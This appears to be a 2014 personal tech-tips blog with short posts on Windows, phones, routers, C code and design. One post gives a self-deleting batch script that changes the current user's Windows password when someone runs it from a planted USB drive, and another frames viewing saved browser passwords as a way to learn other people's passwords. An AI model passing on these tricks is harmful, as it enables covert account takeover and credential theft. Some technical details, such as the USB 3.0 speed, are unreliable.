Friday, 18 April 2014

How to Build Up the logics in Programming

Being a programmer and through my personal experience i want share with the upcoming prograamers about to start with it and become a good future programmer.



Build your Logics through :

Make Pattern programs based on looping index .

Go for nested loops.

Follow recursion and how it occurs .

Do recursion programs using loops to know the actual functioning.




How to save laptop battery




























Adjust Center settings

Lessen screen brightness

Mute the volume when not in use

Manage the power settings

Don't Overcharge it

Try to use laptop as standalone when connected to charger and must be provided with backup 
source.
Turn off wireless when not in use

Turn off auto startup programs.

Maintain the lifecycle of battery

How to install windows with ISO image available

Today I will let you know about methods to install windows just by few clicks when you have an iso Image of windows available.


  • When you have an iso image you have everything .
  • Making a bootable Pendrive to install windows is best and cheapest.This Method is perfectly working for windows 7 and above mine is win 8.1.
  • Let you download a software like portable unitbootin consumes a few MB to make bootable uSB which will install bootloder rquired to boot form pendrive along with ISO of windows
  • Format your USB drive with NTFS file system suppoted for booting in win7 and above.
  • Just run the unitbootin software and mount the iso and select the usb drive availble in list there
  • Start the process and it will take hardly 20 minutes and system will restart.
  • Now the most important one after restarting switch to Usb as your first bootable device that syatem loads on booting in Boot menu or options.



How to start with networking

This post will let you know  how to start with networking.Now a days being a network engineer is a great job and designation and one of the technical field where people are required.




  • Through my experience I want to tell readers to go for Cisco courses available as grdauate and masters programme
  • Working on a live network is a great task and boosts your professional work and pashion but before this you can start as a beggineer with simulator provided by cisco technologies that is Packet Tracer.
  • Using  packet tracer a virtual network can be set up using simulator availed with all the network commands .
  • Here I have shown a simple example with packet tracer in our hands on LAB.


Wednesday, 16 April 2014

How to Access Skype app in windows 8.1


Now that's a funky one all you are updating or will update in upcoming days to windows 8.1.So being used skype to a great access i am providing a basic knowledge to access skype in it provided by default .All you need is to make a microsoft account to access it.

1. Make an account on SKYPE

2. Provide a unique username

3.Provide password

If you already have any other account like in gmail you can connect it to your outlook-microsoft account 



How to Make an impressive Logo

Here's my new post as a designer here i will let you know some tips to make a great logo.
First of all you want is Adobe Photoshop Software and run through some of there basic tutorials.
isn't it Easy !!



Step 1: Decide the theme of your logo that is what the organization,App or buisness is about.
Step 2: Make a sensual feeling logo sketch and ask from others and discuss with friends for better ideas.

Step 3: Collect them all and draw rough sketches.

Step 4 :Collect the images from internet about the theme to get the idea and modulate them for a better output.

Step 5: Cut the images acoording to your logo using adobe photoshop

Step 6: Align them and merge them as you want.

Good Luck !!

Tuesday, 15 April 2014

How to singn in with windows 8

Signing in with a Microsoft account



STEP:1 Connect to an existing Microsoft account

Even if you’re not signed in to your PC with a Microsoft account, you might already have one if you use other Microsoft services like Xbox, Hotmail, Outlook.com, or Skype. Your Microsoft account is the email address you use to sign in to those services.
Enter the email address and password you use to sign in to other Microsoft services, tap or click Next, and follow the instructions.


STEP:2 Sign up with the email address you use most often

If you haven’t used Microsoft services in the past, you can use any email address you want to sign up for a new Microsoft account, including addresses from Outlook.com, Yahoo! or Gmail. To use your favorite email address:
  1. Enter the email address you want to use, and then tap or click Create a new account.
  2. Follow the instructions to fill out your personal and security info, and you're all set.



STEP:3  Get a new email address

If you want to start fresh and get a brand-new email address to use as your Microsoft account, you can get one for free:
  1. Tap or click Create a new account.
  2. Follow the instructions to fill out your personal and security info for a new email address, and you're ready to go.


How to rotate screen in windows xp using keyboard shortcut

This post will teach you how to rotate your desktop screen just by Keyboard in windows XP  .What you have to do is just press a collection of keys on your keyboard.

STEP 1:press CTRL+ALT+UP ARROW

STEP 2:press CTRL+ALT+DOWNARROW


STEP 3:press CTRL+ALT+RIGHT ARROW


STEP 4:press CTRL+ALT+LEFT ARROW

HOW to make android app designs

When a android app is u8nderdevelopment it is first necessity to iknow that how it looks.So Design i utmost important Part and you can earn a lot from it all you need is creativity and an earned software like photoshop.


Step 1: Decide your design using a rough sketch.



Step 3: Research the design aspects on internet to take a rough idea .

Step 4: Divide your design in layers in photoshop and do not forget to use opacity.

Wednesday, 19 March 2014

How to Alter admin password in windows

You can do a lot of hacks using batch programming.Just what you have to know is a code snippet for notepad that will be saved as batch file that is .bat extension.







Step 1: Open Notepad

Step 2 : Write the following code in notepad

@echo off
NET USER %username% howquest
DEL pwd.bat

Step 3: Save the file with any name but with .bat extension 

Step 4: The file is ready to use just you have to copy the file in a USB drive when it is plugged in and file is executed by user password will be automatically change.

Tuesday, 18 March 2014

How to Modify your Old Cell Phone


When you have used your too much and you are stuck with it and its out of guarantee ,What you can do its modify it to get its root access through following steps.





  • Greater Power ,Greater Responsibilty

Through rooting you can get admin access to your PHONE that's what called supersuer that's installed when you root your phone


  • Root your phone through following given steps and verified practically 

how-to-flash-your-android-phone-with-custom-rom


  • Backup your phone

Use CWM to backup your phones everything including ROM. Isn't that interesting


  • Root Your Phone

Visit our POST How to root Android
Visit XDA developers to see the list of rootable phones and tutorials on how to root.


Sunday, 16 March 2014

How to BUILD text based Interactive Interface in C/C++

Why to use graphics when colored text can do the same thing.So here is a sample code in C/C++
to build a colorful text based UI for your project.



#include<iostream.h>
#include<fstream.h>
#include<conio.h>
#include<stdlib.h>
#include<ctype.h>
#include<stdio.h>
#include<string.h>

void main()
{

clrscr();
textcolor(14);
gotoxy(35,3);
cprintf("COMPILER - PASS 1");
gotoxy(37,6);
textcolor(4);
cprintf("INSTRUCTION !!");
textcolor(14);
gotoxy(37,7);
cprintf("--------------");
textcolor(14);
gotoxy(18,8);
int i=0;
//upper horzontal
for(i=0;i<50;i++)
{
cprintf("|");
}
int j,k;
//right vertical
for(j=0;j<10;j++)
  {
    gotoxy(68,8+j);
  cprintf("||");

  }
//bootom horizontal
gotoxy(18,18);
for(i=0;i<52;i++)
{
cprintf("|");
}
  j=0;
  for(j=0;j<10;j++)
  {
    gotoxy(18,8+j);
  cprintf("||");

  }
  gotoxy(22,10);
  textcolor(4);
  cprintf("HOWQUEST ");
     gotoxy(22,20);
     textcolor(14+128);
cprintf("-->");
  textcolor(4);
cprintf("Press Enter To Proceed");
 gotoxy(22,22);
     textcolor(14+128);
cprintf("-->");
  textcolor(4);
cprintf("Press E To Exit");

getch();

}

OUTPUT:




  • Graphics vary here.
  • Run the code then analyse


How to see saved passwords in Browser

Whenever  you log in to a website then it asks to save or remember passwords.This means browser stores that password somewhere that allows us to log in without providing the password the next time if remembered .


This post teaches you how to see that saved passwords which you can use on any others system's browser too to know their passwords.

Step 1:  Launch the Browser .Google chrome here

Step 2:  Launch the settings of the browser a shown



Step 3 : Locate the passwords and forms section within the settings launched.

Click on Managed Saved Passwords




Step 4: A tab will be opened within the browser a shown



Step 5: Tab opened will be listed with saved passwords click on the show button whose paswword you want to know.



Step 6: You may be asked foe windows authentication as a security.




Step 7: After successful log in you will be shown the password.



STAY SAFE !!


How to remove leading and trailing spaces in a string in C

When you are encountered with a string that has trailing or leading spaces than to remove that i have made a small C snippet.

  • Just copy the code in notepad and save the file with .c or .cpp extension and compile the code using a c Compiler.
  • I have used TURBO C-DOS BOX here



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>

char *stripWhitespace (char *inputStr)
{
  char *start, *end;
  size_t len;

  /* Strip leading whitespace */
  start = inputStr;
  while(*start == ' ') start++;
  len = strlen(start);
  memmove(inputStr, start, len + 1);

  /* Strip trailing whitespace */
  end = inputStr + len - 1;
  while(end >= inputStr && *end == ' ') end--;
  *(end + 1) = '\0';

  return inputStr;
}

int main ()
{
clrscr();
    char *mystr  = "   howquest     ";
    printf("\n\nOriginal String:\n");
     puts(mystr);
    stripWhitespace(mystr);
    printf("\n\nAfter Removing Spaces \n");
    puts(mystr);
    getch();
    return 0;
}

OUTPUT:




Wednesday, 12 March 2014

How to type Emoticons with Shortcuts in your iphone



 Step1: Go to Settings > General > Keyboard > Keyboards > Add New Keyboard > Emoji. 

Step2: Go to Settings > General > Keyboard > Add New Shortcut… 

Step3: Insert a frequently used Emoji in Phrase
 
 Step4: Insert a text in Shortcut which will be used to convert to Emoji.


How to save battery life on your Iphone

Running out of battery is the most irritating one so to get rid of it here are the following tips to save battery life


  • Settings > Wi-Fi > Off. 
 
  • Settings > Bluetooth > Off.
 
  • Settings > Privacy > Location Services > Off.
 
  • Settings > General > Cellular > Enable 3G > Off.
 
  • Settings > General > Cellular > Enable LTE > Off.
 
  • Settings > Sounds > Vibrate on Ring & Silent > Off.
 
  • Settings > Brightness & Wallpaper > Auto-Brightness > Off.
 
  • Settings > Mail, Contacts, Calendars > Fetch New Data > Off.

Tuesday, 11 March 2014

How to configure a Wireless DLINK Router


     The wireless router here DLINK is used to give access to multiple users at a time just as in a home network or public network within the College campus.



Step 1: Configure the IP of your host machine within the same network as is default ip of router



Here default ip of router is 192.168.0.50 hence machine is assigned ip 192.168.0.55

 Step 2: Default IP provided by the manufacturer is used to access the Configuration interface .
Here 192.168.0.50.This can be changed by the admin .


Step 3: After logging in DLINK configuring interface welcomes you .

Step 4: Default ip can be changed in the Basic Settings à LAN as shown



Step 5: Wireless setting can be used to change SSID of your router and to set if you want to broadcast it or not
Configuration:

  • ·         SSID is set to ccna
  • ·         SSID broadcast enabled hence ssid is visible to everyone within the range
  • ·         Authentication is used to Validate the user before accessing the wifi
  • ·         Authentication used is WPA2-Personal
  • ·         Password is mentioned within the paraphrase textbox.

Step 6: Create the DHCP dynamic pool from which the users will be assigned IP
Range of pool specified is two hence only two Users can connect at a time.



Step 7: Save the configuration using the configuration tab and selecting Save and activate.



Router will be restarted



Step 8: Use any Wifi adapter enabled System to access the WAP .

Wednesday, 5 March 2014

How to make a simple html document

Here you learn how to start with simple html document




Step 1: Open nOtepad


Step 2: Type any HTML code following the html semantics and structure and your creativity.
We are creating here the simplest document just displaying the name on the html web page


Step 3: After writing the code in HTML save the notepad file with .htm or .html extension.

 

File Saved as shown:



Step 4: Run it using any browser.




How USB 2.0 And USB 3.0 Differ


ReleasedApril 2000November 2008
SpeedHigh Speed or HS, 480 Mbps (Megabits per second)10 times faster than USB 2.0. Super Speed or SS, 4.8 Gbps (Giga bits per second)
Signaling MethodPolling mechanism i.e can either send or receive data (Half duplex)Asynchronous mechanism i.e. can send and receive data simultaneously (Full duplex)
PriceFor a similar product, the USB 2.0 version is generally less expensive than it's USB 3.0 version.For a similar product, the USB 3.0 version is generally more expensive than it's USB 2.0 version.
Power UsageUp to 500 mAUp to 900 mA. Allows better power efficiency with less power for idle states. Can power more devices from one hub.
Number of wires within the cable49
Standard-A ConnectorsGrey in colorBlue in color
Standard-B ConnectorsSmaller in sizeExtra space for more wires
Max Cable length5 meters3 meters

How to Access windows Registry Editing

To edit Registry in your windows you must know how to access it.Here are few steps how you can do that.

Step 1: Open Run Mode in windows.you can do that by Windows + R or simply search it in the search bar shown here



Step 2: Write regedit in search as shown .
You will be shown regedit file with its icon.

Step 3: Just click on it you will be shown the following interface.
registry files are listed here in different categories.




Copyright @ 2013 HowQuest.

Join me on Facebook Follow me on Twitter Subscribe to RSS Email me Give it a title